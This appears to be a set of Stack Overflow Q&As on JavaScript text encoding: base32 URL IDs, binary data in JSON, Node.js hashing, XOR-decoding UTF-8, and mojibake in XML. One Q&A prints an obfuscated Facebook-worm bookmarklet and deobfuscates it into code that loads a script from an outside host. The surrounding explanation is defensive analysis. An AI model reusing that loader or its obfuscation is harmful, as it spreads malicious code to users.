Using Crockford's base 32 for IDs in URLs? - javascript

I'd like to write some IDs for use in URLs in Crockford's base32. I'm using the base32 npm module.
So, for example, if the user types in http://domain/page/4A2A I'd like it to map to the same underlying ID as http://domain/page/4a2a
This is because I want human-friendly URLs, where the user doesn't have to worry about the difference between upper- and lower-case letters, or between "l" and "1" - they just get the page they expect.
But I'm struggling to implement this, basically because I'm too dim to understand how encoding works. First I tried:
var encoded1 = base32.encode('4a2a');
var encoded2 = base32.encode('4A2A');
console.log(encoded1, encoded2);
But they map to different underlying IDs:
6hgk4r8 6h0k4g8
OK, so maybe I need to use decode?
var encoded1 = base32.decode('4a2a');
var encoded2 = base32.decode('4A2A');
console.log(encoded1, encoded2);
No, that just gives me empty strings:
" "
What am I doing wrong, and how can I get 4a2a and 4A2A to map to the same thing?

For an incoming request, you'll want to decode the URL fragment. When you create URLs, you will take your identifier and encode it. So, given a URL http://domain/page/dnwnyub46m50, you will take that fragment and decode it. Example:
#> echo 'dnwnyub46m50' | base32 -d
my_id5
The library you linked to is case-insensitive, so you get the same result this way:
echo 'DNWNYUB46M50' | base32 -d
my_id5
When dealing with any encoding scheme (Base-16/32/64), you have two basic operations: encode, which works on a raw stream of bits/bytes, and decode, which takes an encoded set of bytes and returns the original bit/byte stream. The Wikipedia page on Base32 encoding is a great resource.
When you decode a string, you get raw bytes: it may be that those bytes are not compatible with ASCII, UTF-8, or some other encoding which you are trying to work with. This is why your decoded examples look like spaces: the tools you are using do not recognize the resulting bytes as valid characters.
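In code, the same round trip with the npm module looks something like this (a sketch; whether decode gives you back a printable string depends on what bytes went in):
var base32 = require('base32');
var encoded = base32.encode('my_id5'); // identifier bytes in, base32 string out
console.log(encoded);                  // the encoded form (compare the shell example above)
console.log(base32.decode(encoded));   // 'my_id5', the original identifier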
How you go about encoding identifiers depends on how your identifiers are generated. You didn't say how you were generating the underlying identifiers, so I can't make any assumptions about how you should handle the raw bytes that come out of the decoder, nor about the content of the raw bytes being passed into the encoder.
It's also important to mention that the library you linked to is not compatible with Crockford's Base32 encoding. The library excludes I, L, O, S, while Crockford's encoding excludes I, L, O, U. This would be a problem if you were trying to interoperate with another system that used a different library. If no one besides you will ever need to decode your URL fragments, then interoperability doesn't matter.

The source of your confusion is that base64 and base32 are methods of representing numbers, whereas in your examples you are attempting to encode or decode text strings.
Encoding and decoding text strings as base32 is done by first converting the string into a large number. In your first example, where you encode "4a2a" and "4A2A", those are strings with two different numeric values, which consequently translate to base32-encoded numbers with two different values: 6hgk4r8 and 6h0k4g8.
When you "decode" 4a2a and 4A2A, you say you get empty strings. That's not quite true: the strings are not empty, they contain what the decoded number looks like when interpreted as a string. It looks like nothing because 4a2a decodes to an unprintable character; it's invisible. What you want is to feed the encoder numbers, not strings.

JavaScript has
parseInt(str, 32)
and
num.toString(32)
built in, in a way that's compatible with Java and consistent across JavaScript versions.
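Note that parseInt() is case-insensitive about its digits, which is exactly the property the question asks for. A sketch (this is the built-in 0-9a-v alphabet, not Crockford's, so it won't remap l to 1 for you):
var id1 = parseInt('4a2a', 32); // 141386
var id2 = parseInt('4A2A', 32); // 141386
console.log(id1 === id2);       // true
console.log(id1.toString(32));  // '4a2a', a canonical lower-case form for URLs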

Related

How to fix an invalid random string to make it JSON valid

In JavaScript, I need to "fix" a string that is supposed to be valid JSON but may not be. The string has the following format (the unknown part is marked with "<INVALID_CHARS>"):
[
  { "key_1": "ok_data", "key_2": "something_valid <INVALID_CHARS>" },
  { "key_1": "ok_data", "key_2": "some_valid_value" }
]
"INVALID_CHARS" are chars which make the JSON.parse() function fail.
The errors are always localized on the "key_2" property of this array elements.
Note that these chars come from random binary data, and can thus be anything.
I would like to find the simplest solution, or at least one which is the least prone to errors.
I thought of replacing the invalid characters, but there are other failure modes too: a single backslash followed by a non-special character throws an error, and so do stray quote characters.
And I probably haven't thought of all the possible errors.
Thank you.
JSON is not allowed to contain arbitrary binary data; it must be a sequence of valid Unicode codepoints. (Usually these are transmitted in UTF-8 encoding, but regardless, arbitrary binary data is not possible.) So if you want to include arbitrary binary data you'll need to figure out how to unambiguously encode it for transmission. If you don't encode it in some way, then you won't be able to reliably distinguish a byte which happens to have the same code as " from the " which terminates the string.
There are a number of possible encodings you might use for which standard libraries exist in most languages. One of the most commonly used is base-64.
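For instance, if the producer of this JSON base64-encodes the binary part before serializing, the consumer can always parse it. A browser-side sketch (the field names mirror the question):
// Producer side: wrap the raw bytes in base64 before building the JSON.
var bytes = new Uint8Array([0x00, 0x22, 0x5c, 0x99]); // arbitrary binary data
var b64 = btoa(String.fromCharCode.apply(null, bytes));
var json = JSON.stringify([{ key_1: 'ok_data', key_2: b64 }]); // always valid JSON
// Consumer side: parse, then decode base64 back to bytes.
var parsed = JSON.parse(json);
var decoded = Uint8Array.from(atob(parsed[0].key_2), function (c) {
    return c.charCodeAt(0);
});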
It would be better to clarify the problem, since you seem to describe a wide range of issues here. If your problem is parsing the structure above, you just need to check the syntactic integrity of the structure. For example, this structure parses fine:
let var1 = JSON.parse(`[
  { "key_1": "ok_data", "key_2": "something_valid <INVALID_CHARS>" },
  { "key_1": "ok_data", "key_2": "some_valid_value" }
]`);
If you need to replace <INVALID_CHARS> (binary data) with JSON-safe characters, encoding <INVALID_CHARS> in base64 is the most reliable way. But I suspect the problem is not only packing <INVALID_CHARS> into base64; it is also architectural: you need to prepare the value of key_2 with a valid part and an invalid part. In that case, I would suggest splitting key_2 into two substrings separated by " ": "key_2": "something_valid <INVALID_CHARS>(can be omitted)".
Moreover, it's possible to use separate fields: one for the string without errors and a second for the errors, like this: "key_2_1": "something_valid", "key_2_2": <INVALID_CHARS>. A sketch follows.
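A sketch of that two-field layout (the field names come from the suggestion above; the invalid bytes are hypothetical and base64-packed so the document stays valid JSON):
var row = {
    key_2_1: 'something_valid',
    key_2_2: btoa(String.fromCharCode(0x99, 0x00, 0x5c)) // packed invalid bytes
};
console.log(JSON.stringify(row)); // {"key_2_1":"something_valid","key_2_2":"mQBc"}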
Another way, if it's possible in your setup, is to use multipart form data to transfer the binary data.

Why does hashing in Node.js give different results for the same character?

So I was trying to hash the ¤ character in Node.js, with this function:
crypto.createHash('md5').update('¤', 'ascii').digest('hex')
which gives the md5 hash
f37c6f3896b2c85fbbd01ae32e47b43f
and using Buffer
crypto.createHash('md5').update(new Buffer('¤', 'ascii').toString()).digest('hex')
which gives a result like this:
9b759040321a408a5c7768b4511287a6
I tried to debug Hash.update() to take a look inside, but I can't; it seems to be compiled native code.
Why does crypto's encoding differ from Buffer's? What makes them different?
crypto is encoding the same way as buffers do, so let’s ignore it for now. Here’s a simplification of the issue:
const text = '¤';
const b1 = Buffer.from(text, 'ascii');
const b2 = Buffer.from(b1.toString());
b1 and b2 aren’t the same bytes. b1 is [0xa4], which doesn’t really make much sense as 0xa4 isn’t part of ASCII; Node is using the same code to encode strings as ASCII and Latin-1 here. I don’t know if that’s for compatibility or performance reasons or what, but it seems like a bad idea, results in values for which Buffer.from(s, 'ascii') is different from Buffer.from(Buffer.from(s, 'ascii').toString('ascii'), 'ascii'), and does not appear to be documented anywhere.
In modern versions of Node, the default encoding is UTF-8, so b1.toString() will try to interpret 0xa4 as UTF-8, fail, and produce a replacement character (�) instead, encoded as [0xef, 0xbf, 0xbd]. In non-modern versions of Node, it will do an environment-dependent wrong thing instead of a consistent wrong thing.
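You can check this in the Node REPL:
const b1 = Buffer.from('¤', 'ascii');
console.log(b1);                         // <Buffer a4>, a Latin-1 byte, not valid ASCII
console.log(b1.toString());              // '�', because 0xa4 is not valid UTF-8
console.log(Buffer.from(b1.toString())); // <Buffer ef bf bd>, the replacement character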
You can make your operations give the same result by passing a buffer instead of a UTF-8 encoding of a buffer:
crypto.createHash('md5').update(new Buffer('¤', 'ascii')).digest('hex')
(note how .toString() is removed)
but correct code, able to hash any sequence of Unicode codepoints, would use UTF-8 instead:
crypto.createHash('md5').update('¤', 'utf8').digest('hex')
crypto.createHash('md5').update(Buffer.from('¤', 'utf8')).digest('hex')
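Both of those hash the bytes 0xc2 0xa4 (the UTF-8 encoding of ¤), so they produce the same digest.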

Reconstructing XORed UTF-8 encoded text in JavaScript, client side, no Node

I am going nuts trying to achieve this in JavaScript.
First I will describe the scenario, and then I'll put my code, Python version, which I can't seem to translate into JavaScript.
I have a web page running on a server. I have no access to it whatsoever, so the only way I have to achieve basic functionality is using JavaScript.
The web page is used to compare information. The information is stored in CSV format, which I use to create HTML tables on the fly via AJAX calls. To keep that information from being readily available to users, who could otherwise view the source and 'steal' it, I came across a range of solutions, like encoding in Base64 (I know this is considered 'security by obscurity' and a bad practice, but I have no other choice here).
Base64 is very easy to use in this case, but I lose all the special characters from UTF-8 (like á é í ó ú ñ etc.), which are part of my language (Spanish).
So here comes the preferred solution, which works like a charm in Python: using bitwise XOR. What I would achieve with this method:
If someone figures out the URL of the CSV file, it wouldn't be easy to read the text without basic programming knowledge to decode it.
I can easily program the source database to export the data, run the XOR function over it, and upload those files to the server, where they get decoded on the fly.
It's that last step that I cannot achieve.
Here is my Python script:
To encode:
b = bytearray(open('file.csv', 'rb').read())
for i in range(len(b)):
    b[i] ^= 0x71
open('file.out', 'wb').write(b)
To decode:
b = bytearray(open('file.out', 'rb').read())
for i in range(len(b)):
    b[i] ^= 0x71
I need to achieve that small decoding function in JS.
Thank you all in advance for your time.
Base64
It isn't true that base64 makes you lose non-ASCII characters like ñ or á. Why should it? Base64 can encode any binary data, and encoded text is nothing other than binary data.
So encoding involves two steps:
A text encoding (such as UTF-8) converts your text to bytes, and the base64 encoding turns those bytes into an ASCII string.
Decoding works the same, but backwards (apply the two corresponding decoding functions in reverse order).
This is how text encoding for UTF-8 works in JavaScript:
function encode_utf8(s) {
    return unescape(encodeURIComponent(s));
}
function decode_utf8(s) {
    return decodeURIComponent(escape(s));
}
I got this from here. Please note that I'm not a JS crack at all, and there might be more convenient methods now that I couldn't find.
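One such more convenient method, in environments that have TextEncoder/TextDecoder, would be the following hypothetical equivalents of the two helpers:
function encode_utf8(s) {
    return String.fromCharCode.apply(null, new TextEncoder().encode(s));
}
function decode_utf8(s) {
    return new TextDecoder().decode(Uint8Array.from(s, function (c) {
        return c.charCodeAt(0);
    }));
}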
Let's try this:
s = 'Se bañó todo el día.';
b = encode_utf8(s);       // text encoding
a = btoa(b);              // base64 encoding
console.log(a);           // prints U2UgYmHDscOzIHRvZG8gZWwgZMOtYS4=
d = decode_utf8(atob(a)); // decode base64, then UTF-8
console.log(d);           // prints Se bañó todo el día.
No character lost here.
XOR method
If you still want to do the XOR thing, you can decode as follows:
convert the UTF8-encoded string to an array of code points with Array.from()
XOR-decode with the ^ operator (or ^= assignment)
convert the result to a string with String.fromCodePoint()
decode the string with decode_utf8()
Especially the third step might be a bit cumbersome, and I'm not sure it's worth the pain; the sketch below sidesteps steps 3 and 4 with TextDecoder.
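A minimal sketch, assuming the XORed file can be fetched from the same server and that fetch() and TextDecoder are available (both are standard browser APIs):
// Fetch the XORed file as raw bytes, undo the XOR, then decode as UTF-8.
fetch('file.out')
    .then(function (resp) { return resp.arrayBuffer(); })
    .then(function (buf) {
        var bytes = new Uint8Array(buf);
        for (var i = 0; i < bytes.length; i++) {
            bytes[i] ^= 0x71; // same key as the Python script
        }
        var csv = new TextDecoder('utf-8').decode(bytes);
        console.log(csv); // the original CSV text, special characters intact
    });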
After all, your users can just inspect the JS code to find out how the data are "encrypted", be it base64 or the XOR method.
Note
If you come from a Python background, be aware that there is no distinction like Python's str and bytes types. Both the input and output of the {en,de}code_utf8() functions are strings, of the same type. When you encode a string, you just get back another string in which every codepoint is below 256, and it may be longer than the input string.
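For example, with the helpers above:
console.log(encode_utf8('ñ'));        // 'Ã±', two code points, both below 256
console.log(encode_utf8('ñ').length); // 2, from an input of length 1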

How to encode this script?

I have recently found this script, which is basically a Facebook "worm", so don't run it. All I want to know is how the creator went about encoding it. Any help?
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64\x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a);void(0);
The author used various methods of 'obfuscation', that is, various techniques to make the code visually confusing and hard to understand.
_0x8dd5 is an array of strings:
['src', 'script', 'createElement',
'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']
The rest of the code uses property names from the strings above, such that the un-obfuscated code is actually
a = document.createElement('script');
a.src = 'http://ug-radio.co.cc/flood.js';
document.body.appendChild(a);
Therefore, all the author did to obfuscate the code was reference all property names as strings from an array. The array that contains the strings simply uses \xNN hexadecimal escape notation, making it less obvious what those strings are.
The author does this by finding the hexadecimal values of the bytes that form the strings in the current encoding. Then, for each byte in the strings, he adds \xNN, where NN is the hexadecimal byte value. When the JavaScript interpreter runs the script, the parser automatically replaces these escapes with their respective characters.
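For illustration, a hypothetical helper (hexEscape is my name for it, not the author's) that produces the same escapes:
function hexEscape(s) {
    return s.split('').map(function (c) {
        return '\\x' + ('0' + c.charCodeAt(0).toString(16).toUpperCase()).slice(-2);
    }).join('');
}
console.log(hexEscape('src')); // \x73\x72\x63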

Handling Unicode in the HTTP response XML

I'm writing a Google Chrome extension that builds upon the myanimelist.net REST API. Sometimes the XMLHttpRequest response text contains Unicode characters.
For example:
<title>Onegai My Melody Sukkiri&acirc;�&ordf;</title>
If I create a HTML node from the text it looks like this:
Onegai My Melody Sukkiriâ�ª
The actual title, however, is this:
Onegai My Melody Sukkiri♪
Why is my text not correctly rendered and how can I fix it?
Update
Code: background.html
I think these are the crucial parts:
function htmlDecode(input){
    var e = document.createElement('div');
    e.innerHTML = input;
    return e.childNodes.length === 0 ? "" : e.childNodes[0].nodeValue;
}
function xmlDecode(input){
    var result = input;
    result = result.replace(/&lt;/g, "<");
    result = result.replace(/&gt;/g, ">");
    result = result.replace(/\n/g, "<br>");
    return htmlDecode(result);
}
Further:
var parser = new DOMParser();
var xmlText = response.value;
var doc = parser.parseFromString(xmlDecode(xmlText), "text/xml");
<title>Onegai My Melody Sukkiri&acirc;�&ordf;</title>
Oh dear! Not only is that the wrong text, it's not even well-formed XML. acirc and ordf are HTML entities which are not predefined in XML, and then there's an invalid UTF-8 sequence (one high byte, presumably originally 0x99) between them.
The problem is that myanimelist are generating their output ‘XML’ (but “if it ain't well-formed, it ain't XML”) using the PHP function htmlentities(). This tries to HTML-escape not only the potentially-sensitive-in-HTML characters <&"', but also all non-ASCII characters.
This generates the wrong characters because PHP defaults to treating the input to htmlentities() as ISO-8859-1 instead of UTF-8 which is the encoding they're actually using. But it was the wrong thing to begin with because the HTML entity set doesn't exist in XML. What they really wanted to use was htmlspecialchars(), which leaves the non-ASCII characters alone, only escaping the really sensitive ones. Because those are the same ones that are sensitive in XML, htmlspecialchars() works just as well for XML as HTML.
htmlentities() is almost always the Wrong Thing; htmlspecialchars() should typically be used instead. The one place you might want to encode non-ASCII bytes to entity references would be when you're targeting pure ASCII output. But even then htmlentities() fails, because it doesn't produce numeric character references (&#...;) for characters that don't have a predefined entity name. Pretty useless.
Anyway, you can't really recover the mangled data from this. The � represents a byte sequence that was UTF-8-undecodable to the XMLHttpRequest, so that information is irretrievably lost. You will have to persuade myanimelist to fix their broken XML output as per the above couple of paragraphs before you can go any further.
Also, they should be returning it as Content-Type: text/xml, not text/html as they do at the moment. Then you could pick up the responseXML directly from the XMLHttpRequest object instead of messing about with DOMParsers.
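If they did fix the Content-Type, the extension side would reduce to something like this sketch, with no manual entity replacement at all:
function fetchXml(url) {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', url);
    xhr.onload = function () {
        var doc = xhr.responseXML; // already parsed, given Content-Type: text/xml
        console.log(doc.getElementsByTagName('title')[0].textContent);
    };
    xhr.send();
}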
So, I've come across something similar to this at work, and I did a bit more research to confirm my hypothesis.
If you take a look at the returned value you posted above, you'll notice the tell-tale entity "â". 99% of the time when you see this entity, it means you have a character encoding issue (typically UTF-8 bytes being interpreted as ISO-8859-1).
The first thing I would test is whether you can force a character encoding in the API return. (It's a long shot, but you could look.)
Second, I'd try to force a character encoding onto the returned data (I know there's an .htaccess override, but I don't know what's allowed in Chrome extensions, so you'll have to research that).
What I believe is going on is that when you create the node with the data, you don't have a character encoding set on the document, and browsers (typically, in my experience) default to ISO-8859-1. So check that it isn't your document that's the problem.
Finally, if you can't find (or can't prevent) the source of the encoding problem, you'll have to write a conversion table to replace the malformed values you're getting with the ones you want (JavaScript's replace should be fine: http://www.w3schools.com/jsref/jsref_replace.asp).
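Such a conversion table might look like this (the mappings are hypothetical examples of UTF-8-read-as-ISO-8859-1 mojibake, not the actual values from this API):
var table = { 'Ã±': 'ñ', 'Ã³': 'ó', 'Ã¡': 'á' };
function fixMojibake(s) {
    return s.replace(/Ã±|Ã³|Ã¡/g, function (m) { return table[m]; });
}
console.log(fixMojibake('EspaÃ±a')); // 'España'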
You can't just use a simple search and replace to fix encoding issues, since the offending values are Unicode, not characters typed on a keyboard.
Your data must be stored on the server in UTF-8 format if you are planning to retrieve it via AJAX. This problem is probably due to someone pasting in characters from MS Word, which uses a completely different encoding scheme (ISO-8859).
If you can't fix the data, you're kinda screwed.
For more details, see: UTF-8 vs. Unicode
